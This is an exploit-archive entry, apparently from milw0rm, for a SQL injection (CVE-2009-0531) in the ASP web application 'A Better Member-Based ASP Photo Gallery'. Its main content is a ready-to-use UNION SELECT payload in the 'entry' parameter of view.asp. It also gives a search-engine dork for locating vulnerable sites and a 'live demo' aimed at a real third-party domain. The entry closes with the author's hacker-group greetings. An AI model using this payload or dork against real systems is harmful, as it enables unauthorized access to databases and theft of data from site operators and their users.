A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection



EKU-ID: 15845 CVE: OSVDB-51989;CVE-2009-0531 OSVDB-ID:
Author: BackDoor Published: 2009-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Script:A Better Member-Based ASP Photo Gallery
Download:
http://www.ontarioabandonedplaces.com/ipguardian/ABetterMemberBasedASPPhotoGallery.zip
Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery
Exploit:www.target.com/scriptpath/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
Dork:intitle:"A Better ASP User Gallery"
Live Demo:
www.ontarioabandonedplaces.com/ipguardian/gallery/view.asp?entry=-1+union+select+0,title,2,creator,Longitude,5,pics+from+photos
BackDoordan Sevgilerle Thanks All Cyber-Warrior User : )
BackDoor Cyber-Warrior.Org - Akıncılar - Lojistik

# milw0rm.com [2009-02-09]